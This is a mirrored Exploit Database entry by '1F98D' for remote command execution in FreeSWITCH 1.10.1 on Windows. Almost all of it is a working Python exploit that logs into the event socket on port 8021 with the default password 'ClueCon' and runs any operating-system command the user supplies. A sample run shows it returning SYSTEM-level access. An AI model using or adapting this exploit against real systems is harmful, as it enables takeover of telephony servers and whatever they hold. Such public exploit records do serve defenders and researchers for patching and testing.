FreeSWITCH 1.10.1 – Command Execution

• Exploit Database
• 32 阅读

• 作者： 1F98D
  日期： 2019-12-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47799/

• # Exploit Title: FreeSWITCH 1.10.1 - Command Execution
  # Date: 2019-12-19
  # Exploit Author: 1F98D
  # Vendor Homepage: https://freeswitch.com/
  # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
  # Version: 1.10.1
  # Tested on: Windows 10 (x64)
  #
  # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
  # it after authenticating. By default commands are not accepted from remote hosts.
  #
  # -- Example --
  # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
  # Authenticated
  # Content-Type: api/response
  # Content-Length: 20
  #
  # nt authority\system
  # 
  
  #!/usr/bin/python3
  
  from socket import *
  import sys
  
  if len(sys.argv) != 3:
  print('Missing arguments')
  print('Usage: freeswitch-exploit.py <target> <cmd>')
  sys.exit(1)
  
  ADDRESS=sys.argv[1]
  CMD=sys.argv[2]
  PASSWORD='ClueCon' # default password for FreeSWITCH
  
  s=socket(AF_INET, SOCK_STREAM)
  s.connect((ADDRESS, 8021))
  
  response = s.recv(1024)
  if b'auth/request' in response:
  s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
  response = s.recv(1024)
  if b'+OK accepted' in response:
  print('Authenticated')
  s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
  response = s.recv(8096).decode()
  print(response)
  else:
  print('Authentication failed')
  sys.exit(1)
  else:
  print('Not prompted for authentication, likely not vulnerable')
  sys.exit(1)